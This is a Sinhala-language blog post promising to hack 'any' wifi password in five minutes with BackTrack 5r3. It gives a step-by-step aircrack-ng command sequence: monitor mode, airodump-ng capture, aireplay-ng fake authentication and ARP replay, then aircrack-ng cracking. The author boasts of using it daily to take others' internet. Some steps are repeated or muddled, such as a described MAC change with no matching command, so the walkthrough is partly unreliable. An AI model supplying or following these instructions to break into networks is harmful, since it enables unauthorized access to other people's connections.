WIFI හැක් කරමු විනාඩි 5න් 100% වැඩ.. [ How to Hack WIFI ]
ඔන්න යාළුවනේ අදත් අපේ කට්ට්ය වෙනුවෙන් මන් අරන් ආවා HACKING යටතේ සුපිරි පොස්ට් එකක්...මේක නං අනිත් පොස්ට් වගේ නෙමෙයි තරමක් සංකීර්ණ කටයුත්තක්...හරි අද අපේ වැඩේ තමයි...WIFI password එකක් හැක් කිරීම.හරිම ලේසි...බය වෙන්න දෙයක් නෑ
ඕනෙම wifi එකක් හැක් කරන්න පුළුවන්...එහෙනං අපි වැඩේට බහිමු...
wifi හැක් කරන්න ඕනෙනං ඉතින් අනිවා පල්ලෙහා ටික ඕන වෙනවා
Linux BackTrack 5r3 DVD
Compatible Wireless Adapter
මන් දන්නවා ඔයාලා ගාව Compatible Wireless Adapter එකක් තියෙන බව
මන් දන්නවා ඔයාලා ගාව Compatible Wireless Adapter එකක් තියෙන බව
BackTrack 5r3 නැති අය මෙතනින් එක බාගන්න..
දැන් Virtuual Machine එකෙන් ඔයාගේ පරිගණකයට ස්ථාපනය කරගන්න..මමනං ඕකට යොදා ගත්තේ VmWare කියන software එක..
VmWare කියන software එක මෙතනින් බාගන්න
ඔන්න දැන් තමයි වැඩේට enter වෙන්නේ...
ඔයාලා BackTrack 5r3 බාගත්තනේ..හරි දැන් ඔයා Shell Commands එකක් ඕපන් කරගන්න..එකේ ඔය පල්ලෙහා දාලා තියෙන එක දුන්නම දැනට තියෙන wifi network ටික ඔක්කොම පෙන්නනවා
airmon-ng
ඔතන තියෙන rao කියන එක ත්මි මම දිගටම පාවිච්චි කරන්නේ...ඔයාලත් දැන් මේ rao එක හොයන්න යන්න එපා..rao කියනේ මන් හැක් කරන්න ඉන්න wifi network එක..ඔයාලා ගන්න ඔයාලගේ network එක
දැන් පල්ලෙහා තියෙන එක දෙන්න
airmon-ng stop ra0
අපි මෙතනදී කරන දේ තමයි WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන එක
දැන් ඔය පල්ලෙහා එක දෙන්න..
ifconfig ra0 down
දැන් පල්ලෙහා එක දෙන්න
airmon-ng start ra0
මෙන්න මෙතැනදී අපි බලන්නේ අලුත් කරපු මැක් ඇඩ්ර්ස් එක හරිද කියල බලන එක..
දැන් පල්ලෙහා එක දෙන්න
දැන් පල්ලෙහා එක දෙන්න
දැන් පල්ලෙහා එක දෙන්නකෝ..
airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0
මෙතනදී අපිට හරියටම හොයා ගන්න පුළුවන් WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න...ඊට පස්සේ අපිට හැකිවෙනවා අපි හැක් කරන්න යන wifi network එකට දැන් ලොග් වෙලා ඉන්න කෙනෙක්ව හොයාගන්න..
දැන් පල්ලෙහා එක දෙන්නකෝ
aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0
දැන් පල්ලෙහා එක දෙන්න
aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0
දැන් පල්ලෙහා එක දෙන්න
aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)
ඔන්න දැන් ඉතින් අපි password එක හොයාගත්ත හරිය..දැන් ඕව ගහල කරලා ඉන්ටනෙට් එකම බාගනිල්ලා..මමනං ඕක තමයි කරන්නේ හැමදාම..
මන් හිතනවා මේක අපේ හැම කෙනෙක්ටම වැදගත් වෙයි කියලා එහෙනං ගිහින් එන්නන් සුභ දවසක්...කමෙන්ට් එකක් දාල යන්න අමතක කරන්න එපා හොදේ..
No comments: